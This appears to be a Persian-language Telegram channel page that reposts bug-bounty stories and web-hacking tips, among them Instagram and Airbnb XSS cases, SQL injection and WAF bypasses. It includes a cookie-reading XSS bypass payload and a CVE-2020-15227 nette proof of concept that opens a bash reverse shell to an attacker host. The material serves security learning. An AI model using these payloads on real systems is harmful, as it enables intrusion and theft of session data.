Web_Priv8
764 subscribers
405 photos
24 videos
45 files
588 links
Sina Doosti @r00t98
Web Security Researcher, Bug Hunter
https://twitter.com/r00t98

Amir Hasanvand @al9n3_wolf
Web Security Researcher, Bug Hunter
https://twitter.com/al9n3_wolf
Download Telegram
باگ ۲۵ هزار دلاری اینستاگرام

یه پسر ۱۴ ساله می‌خواسته واسه اپ خودش، از فیلترهای اینستاگرام استفاده کنه. برای اینکار نیاز به فهم سیستم واقعیت افزوده (Spark AR) شرکت فیسبوک داشته. وقتی در استفاده از این سیستم، اسم فایل پیش‌نمایش رو خواسته عوض کنه متوجه می‌شه که اعلانی که بعدش نمایش داده میشه تابع و دربردارنده‌ی همین اسمه و می‌تونه توش پیلودهای XSS رو تست کنه. چون سامانه، محدودیت کاراکترهایی مثل تگ داشته مجبور شده برای دور زدنش بیاد تزریق HTML انجام بده. چی؟ اینکه طرف رو Redirect کنه به یه صفحه‌ی مخرب دیگه. بعد از اینکه گزارش این باگ رو می‌فرسته، کارشناسان فیسبوک بهش می‌گن درسته که شما اومدی یه باگ Open Redirection فرستادی برامون، اما ما متوجه شدیم این باگ قابلیت تبدیل به XSS هم داشته (اگر charset رو به UTF-7 تغییر می‌دادی). پس به همون مقدار بهت جایزه می‌دیم، یعنی ۲۵ هزار دلار.
@offsecmag
در mysql نسخه های بالاتر از 5.7.22 میتوان بجای Group_concat از json_arrayagg استفاده کرد


#sqli
#pentest
#waf


@sec_nerd
This media is not supported in your browser
VIEW IN TELEGRAM
چطور روی شرکت بزرگی مثل Airbnb باگ XSS کشف می‌شه (روی APIای که خروجی JSON می‌ده!) و چطور فیلترها و مکانیزم‌های امنیتی روی این پلتفرم دور زده می‌شه و نهایتا ۱۵ هزار دلار جایزه می‌بره. توی این ویدئو ببینید.
@offsecmag
کشف باگ RCE در اپلیکیشن اندرویدی فیسبوک به واسطه دانلود فایل

https://medium.com/@dPhoeniixx/arbitrary-code-execution-on-facebook-for-android-through-download-feature-fb6826e33e0f


#facebook
#rce
#bugbounty
#android


@sec_nerd
راهکارهای دور زدن WAF در حملات XSS

#waf
#xss
#pentest
#bugbounty

@sec_nerd
دور زدن WAF و بلک لیست با پیلود جدید XSS

Payload: alert?.(document?.cookie)


#xss
#bugbounty


@sec_nerd
شرق آسیایی ها بعد از اپلیکیشن های مبتنی بر جاوا حالا سراغ فریمورک های php رفتن و اینبار از فریمورک nette آسیب پذیری RCE کشف کردن

CVE-2020-15227 PHP framework nette callback RCE

POC: /nette.micro?callback=shell_exec&cmd=bash%20-i%20>&%20/dev/tcp/'+lhost+'/'+lport+'0>&1


#php
#nette
#rce


@sec_nerd
راهکارهایی برای دور زدن پیامهای 403 و 401

#bugbounty
#pentest


@sec_nerd